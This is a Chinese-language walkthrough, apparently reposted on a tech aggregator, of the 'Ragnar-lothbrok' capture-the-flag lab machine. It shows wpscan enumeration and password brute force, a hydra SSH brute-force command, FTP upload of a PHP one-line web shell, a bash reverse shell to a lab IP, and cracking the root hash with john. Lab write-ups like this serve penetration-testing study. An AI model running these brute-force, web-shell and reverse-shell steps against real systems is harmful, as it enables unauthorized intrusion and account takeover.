Ragnar

编程入门 行业动态 更新时间:2024-10-07 04:27:33

<a href=https://www.elefans.com/category/jswz/34/1662881.html style=Ragnar"/>

Ragnar

Ragnar-lothbrok

信息搜集

存活检测

详细扫描

后台网页扫描

网站信息搜集

  • secret “秘密”网页

    将密文保存到 password.txt

  • 此页面使用了 wordpress CMS

  • 疑似用户 ragnar

  • wpscan 也爆破出了用户 ragnar

    wpscan --url / --enumerate u 
    

密码获取

  • 尝试利用搜集的用户名和密码爆破网站、ftp、ssh 密码

尝试网页登录爆破

wpscan --url / --usernames ragnar --passwords password.txt

爆破出密码 ubbe

ssh 爆破

hydra -l ragnar -P password.txt ssh://10.4.7.155

ragnar 密码为 lagertha

漏洞利用

  • 查看 ftp 中有用的信息

  • 未搜集到有用信息

  • 网页登录

    10.4.7.155/wordpress/wp-login.phpragnar
    ubbe
    

    卡的登不上去

  • 直接尝试 ftp 上传一句话木马

    put shell.php
    

    成功上传

  • 蚁剑连接,发现可以连接

  • 打开蚁剑中虚拟终端,反弹进 kali

    bash -c 'bash -i >& /dev/tcp/10.4.7.146/7777 0>&1'
    

    成功反弹

提权

  • 信息搜集

    切换到 home 目录,发现有用户 ragnar

  • 尝试使用其 web 和 ftp 密码登录

    密码未 ftp 登陆密码 lagertha

  • 查找敏感文件

    在 秘密 文件中可以直接看到 root 加密后的密码

  • john 爆破

  • 切换 root

    成功提权

更多推荐

Ragnar

本文发布于:2023-12-03 10:50:48,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1654536.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:Ragnar

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!